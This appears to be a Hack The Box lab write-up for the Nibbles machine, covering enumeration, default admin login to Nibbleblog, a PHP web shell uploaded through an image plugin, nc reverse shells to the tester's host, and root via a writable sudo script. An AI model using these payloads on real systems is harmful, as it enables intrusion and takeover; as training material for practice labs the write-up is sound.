#linux #hackthebox #easy
![[Pasted image 20250611221947.png]]
# Nmap - Enumeration
Initial port scanning result (all ports 1~65,535)
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS 10.10.10.75 -Pn -n --open -p- -oN tcpall
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:53 CDT
Nmap scan report for 10.10.10.75
Host is up (0.051s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
```
A more detailed scan is performed on the discovered ports, 22 and 80
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV 10.10.10.75 -p 22,80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-11 20:54 CDT
Nmap scan report for 10.10.10.75
Host is up (0.052s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
```
# Footprinting
Navigated to the webpage `10.10.10.75` and its page source revealed the presence of the `/nibbleblog` directory
![[Pasted image 20250611205820.png]]
I ran `Gobuster` to enumerate directories and files on `10.10.10.75/nibbleblog`. It revealed several interesting directories and files.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://10.10.10.75/nibbleblog -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.75/nibbleblog
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 301]
/index.php (Status: 200) [Size: 2987]
/sitemap.php (Status: 200) [Size: 402]
/content (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/]
/feed.php (Status: 200) [Size: 302]
/admin (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]
/admin.php (Status: 200) [Size: 1401]
/plugins (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/install.php (Status: 200) [Size: 78]
/update.php (Status: 200) [Size: 1622]
/README (Status: 200) [Size: 4628]
/languages (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
/LICENSE.txt (Status: 200) [Size: 35148]
```
`/admin.php` presented a login page where `admin:nibbles` worked as valid credentials.
![[Pasted image 20250611211703.png]]
This is how the nibbleblog dashboard looks after logged in as admin
![[Pasted image 20250611212022.png]]
In the `Settings` tab, scroll all the way to the bottom to find the Nibbleblog version, which is **4.0.3**
![[Pasted image 20250611212148.png]]
In the `Plugins` tab, I found a feature that allows file uploads. I believe this can be leveraged to gain an initial foothold.
![[Pasted image 20250611212614.png]]
First, I uploaded an image file to test where the images are saved. Then I clicked the `View Blog` button and noticed that the `MY IMAGE` section had been updated.
![[Pasted image 20250611213847.png]]
![[Pasted image 20250611213922.png]]
You can right-click on the uploaded image and select 'Open image in new tab' which will open up a new browser tab with the following URL: `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.jpg`.
As shown in the URL, the server renamed the uploaded file to `image.jpg`. The original filename was `cat.jpg`.
Based on the previous test results, I created a file containing a simple PHP one-liner `<?php system($_GET['cmd']); ?>` and uploaded it as `cmd.php`.
Then I navigated to `http://10.10.10.75/nibbleblog/content/private/plugins/my_image/cmd.php?cmd=id` but it returned **Not Found**. After changing the filename in the URL to `image.php`, the command executed successfully.
![[Pasted image 20250611214933.png]]
Now it's time to get our reverse shell. I have updated my `cmd.php` to make it connect back to us.
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ cat cmd.php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f"); ?>
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
```
Got the shell!
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 39358
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
```
Found `user.txt`
```bash
nibbler@Nibbles:/home/nibbler$ cat user.txt
cb8c...
```
# PrivEsc
`sudo -l` command revealed that the user `nibbler` can run the following commands as `root`.
```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
We can modify `stuff` to contain another reverse shell that connects back to me and grants a shell as `root`
```bash
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat monitor.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1235 >/tmp/f
```
Run the following command to fire up the reverse shell `sudo /home/nibbler/personal/stuff/monitor.sh`
Connected as `root` and found `root.txt`
```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1235
listening on [any] 1235 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.75] 40764
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
21643b4fbcc4d4e1854077397e4d9ee0
```